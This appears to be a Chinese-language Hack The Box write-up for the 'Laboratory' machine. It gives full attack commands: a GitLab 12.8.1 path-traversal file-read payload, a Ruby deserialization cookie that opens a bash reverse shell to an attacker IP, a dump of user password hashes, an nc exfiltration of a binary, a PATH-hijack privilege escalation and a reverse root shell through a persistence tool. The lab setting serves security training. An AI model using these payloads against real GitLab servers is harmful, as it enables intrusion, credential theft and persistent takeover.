Information Gathering

IP Address	Opening Ports
10.10.10.216	TCP:22,80,443

$ ip='10.10.10.216'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 25ba648f799d5d95972c1bb25e9b550d (RSA)
|   256 2800890555f9a2ea3c7d70ea4dea600f (ECDSA)
|_  256 7720ffe946c068921a0b2129d153aa87 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

GitLab-v12.8.1 LFI

# echo '10.10.10.216 laboratory.htb git.laboratory.htb' >>/etc/hosts

https://laboratory.htb/

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图

https://git.laboratory.htb/users/sign_in

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图1

注册用户登录

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图2

https://git.laboratory.htb/help

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图3

https://hackerone.com/reports/827052

创建两个项目A,B

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图4

在项目A中的issues中添加

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图5

将issues移动到B项目中

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图6

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图7

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图8

Ruby-deser secret_key_base RCE

设置Gitlab实例

https://packages.gitlab.com/gitlab/gitlab-ce/packages/ubuntu/xenial/gitlab-ce_12.8.1-ce.0_amd64.deb

$ gitlab-ctl reconfigure

$ gitlab-ctl restart

$ gitlab-rails console

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
erb = ERB.new("<%= bash -c 'bash -i>& /dev/tcp/10.10.16.31/10032 0>&1' %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb,:result, "@result", ActiveSupport::Deprecation.new)
cookies = request.cookie_jar
cookies.signed[:cookie] = depr
puts cookies[:cookie]

$ curl -vvv 'https://git.laboratory.htb/users/sign_in' -k -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjIvNDQ0NCAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=- -8fdb57c5b65cef79b38c842cc0a42570ff756636"

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图9

Docker Escape(gitlab-rails):Lateral Movement

$ gitlab-rails console

users = User.all
users.each do |user|
  puts "ID: #{user.id}, Username: #{user.username}, Email: #{user.email}, Encrypted Password: #{user.encrypted_password}"
end

将我们用户权限修改为admin

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图10

user = User.find_by(username: 'map')
user.admin = true
user.save!

https://git.laboratory.htb/explore

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图11

https://git.laboratory.htb/dexter/securedocker/-/blob/master/dexter/.ssh/id_rsa

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图12

User.txt

9c2a8cd5962ffcbf1f56cd3ec5e6fde8

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.25 --lport 10000 --rhost 10.10.16.25 --rport 10032 --http 9999

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图13

Privilege Escalation:docker-security && chmod Path hijack

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图14

$ nc 10.10.16.31 10011 </usr/local/bin/docker-security

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图15

PS:可以使用ltrace命令跟踪docker-security所执行的库调用。

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图16
这里常规使用#!/bin/bash\n/bin/bash写入/tmp/chmod再进行$ export PATH=/tmp:$PATH就可以进行路径劫持了。

这里将使用Tyrant进行持久化控制

将Tyrant上传靶机

https://github.com/MartinxMax/Tyrant

$ echo '/tmp/tyrant'>/tmp/chmod
$ /usr/bin/chmod +x chmod
$ /usr/bin/chmod +x tyrant
$ export PATH=/tmp:$PATH
$ /usr/local/bin/docker-security

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图17

反弹ROOT会话

$ ./tyrant -uid 0 -rhost 10.10.16.31 -rport 4451

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…插图18

Root.txt

07456541386c4c220bac22b424b00f3b

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…

Information Gathering

GitLab-v12.8.1 LFI

Ruby-deser secret_key_base RCE

Docker Escape(gitlab-rails):Lateral Movement

User.txt

TRP00F

Privilege Escalation:docker-security && chmod Path hijack

Root.txt

相关文章

发布评论取消回复

[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…

Information Gathering

GitLab-v12.8.1 LFI

Ruby-deser secret_key_base RCE

Docker Escape(gitlab-rails):Lateral Movement

User.txt

TRP00F

Privilege Escalation:docker-security && chmod Path hijack

Root.txt

相关文章：

相关文章

发布评论 取消回复

发布评论取消回复